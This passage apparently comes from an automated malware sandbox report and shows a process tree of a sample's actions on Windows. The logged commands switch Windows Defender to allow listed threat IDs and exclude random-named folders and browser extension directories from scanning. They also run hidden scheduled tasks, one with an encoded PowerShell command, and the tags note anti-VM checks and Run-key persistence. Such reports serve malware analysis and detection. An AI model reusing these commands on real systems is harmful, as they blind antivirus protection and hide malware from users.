                                                    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                    2⤵
                                                    • Drops file in System32 directory
                                                    • Modifies data under HKEY_USERS
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:5108
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                      3⤵
                                                        PID:1768
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                          4⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:5212
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:3340
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                        3⤵
                                                          PID:876
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                          3⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:5780
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                          3⤵
                                                            PID:4720
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                            3⤵
                                                              PID:5324
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                              3⤵
                                                                PID:3388
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                3⤵
                                                                  PID:1532
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                  3⤵
                                                                    PID:4488
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                    3⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:2276
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                    3⤵
                                                                      PID:6128
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                      3⤵
                                                                        PID:4328
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                        3⤵
                                                                          PID:2084
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                          3⤵
                                                                            PID:4740
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                            3⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:3436
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                            3⤵
                                                                              PID:3396
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                              3⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:3140
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                              3⤵
                                                                                PID:3064
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                3⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:4140
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                3⤵
                                                                                  PID:5156
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                  3⤵
                                                                                    PID:5740
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                    3⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:436
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                    3⤵
                                                                                      PID:5916
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                      3⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:3532
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                      3⤵
                                                                                        PID:2712
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                        3⤵
                                                                                          PID:6028
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                          3⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:4436
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                          3⤵
                                                                                            PID:5896
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GWamqZVWU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GWamqZVWU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QEWXpPeaXUxnC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QEWXpPeaXUxnC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WfxNQjjWZmUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WfxNQjjWZmUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qCkphlJEjzXU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qCkphlJEjzXU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\usHRsfrcBQZgjTeIdMR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\usHRsfrcBQZgjTeIdMR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\waPdBDBOzCnVwFVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\waPdBDBOzCnVwFVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\SzOsjPJAGPNEYYQWc\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\SzOsjPJAGPNEYYQWc\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\kvKwEgGmKkXJvFrr\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\kvKwEgGmKkXJvFrr\" /t REG_DWORD /d 0 /reg:64;"
                                                                                          2⤵
                                                                                          • Drops file in System32 directory
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Modifies data under HKEY_USERS
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:5772
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GWamqZVWU" /t REG_DWORD /d 0 /reg:32
                                                                                            3⤵
                                                                                              PID:5616
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GWamqZVWU" /t REG_DWORD /d 0 /reg:32
                                                                                                4⤵
                                                                                                  PID:1956
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GWamqZVWU" /t REG_DWORD /d 0 /reg:64
                                                                                                3⤵
                                                                                                  PID:3504
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QEWXpPeaXUxnC" /t REG_DWORD /d 0 /reg:32
                                                                                                  3⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:1556
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QEWXpPeaXUxnC" /t REG_DWORD /d 0 /reg:64
                                                                                                  3⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:5232
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WfxNQjjWZmUn" /t REG_DWORD /d 0 /reg:32
                                                                                                  3⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:4572
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WfxNQjjWZmUn" /t REG_DWORD /d 0 /reg:64
                                                                                                  3⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:868
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qCkphlJEjzXU2" /t REG_DWORD /d 0 /reg:32
                                                                                                  3⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:4460
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qCkphlJEjzXU2" /t REG_DWORD /d 0 /reg:64
                                                                                                  3⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:3740
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\usHRsfrcBQZgjTeIdMR" /t REG_DWORD /d 0 /reg:32
                                                                                                  3⤵
                                                                                                    PID:3060
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\usHRsfrcBQZgjTeIdMR" /t REG_DWORD /d 0 /reg:64
                                                                                                    3⤵
                                                                                                      PID:2588
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\waPdBDBOzCnVwFVB /t REG_DWORD /d 0 /reg:32
                                                                                                      3⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:2432
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\waPdBDBOzCnVwFVB /t REG_DWORD /d 0 /reg:64
                                                                                                      3⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:1420
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                      3⤵
                                                                                                        PID:760
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                        3⤵
                                                                                                          PID:2800
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                          3⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:768
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                          3⤵
                                                                                                            PID:3328
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\SzOsjPJAGPNEYYQWc /t REG_DWORD /d 0 /reg:32
                                                                                                            3⤵
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:1752
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\SzOsjPJAGPNEYYQWc /t REG_DWORD /d 0 /reg:64
                                                                                                            3⤵
                                                                                                              PID:4092
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\kvKwEgGmKkXJvFrr /t REG_DWORD /d 0 /reg:32
                                                                                                              3⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:2080
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\kvKwEgGmKkXJvFrr /t REG_DWORD /d 0 /reg:64
                                                                                                              3⤵
                                                                                                                PID:5956
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /CREATE /TN "gRkOKCBOC" /SC once /ST 05:56:29 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                              2⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                              PID:1300
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /run /I /tn "gRkOKCBOC"
                                                                                                              2⤵
                                                                                                                PID:4968
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /DELETE /F /TN "gRkOKCBOC"
                                                                                                                2⤵
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:1692
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /CREATE /TN "CXcXrFnFggmBuldeR" /SC once /ST 05:16:48 /RU "SYSTEM" /TR "\"C:\Windows\Temp\kvKwEgGmKkXJvFrr\rZMTnhYjhyLmNuX\bkUoUio.exe\" Fz /glFIdidiV 385107 /S" /V1 /F
                                                                                                                2⤵
                                                                                                                • Drops file in Windows directory
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:3316
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /run /I /tn "CXcXrFnFggmBuldeR"
                                                                                                                2⤵
                                                                                                                  PID:936
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3876 -s 1044
                                                                                                                  2⤵
                                                                                                                  • Program crash
                                                                                                                  PID:1756
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                                                                1⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:3372
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                1⤵
                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                • Checks BIOS information in registry
                                                                                                                • Executes dropped EXE
                                                                                                                • Identifies Wine through registry keys
                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                PID:4708
                                                                                                              • C:\Users\Admin\Pictures\Lighter Tech\runtime.exe
                                                                                                                "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe"
                                                                                                                1⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Adds Run key to start application
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                PID:3108
                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                  2⤵
                                                                                                                    PID:2328
                                                                                                                  • C:\Windows\System32\cmd.exe
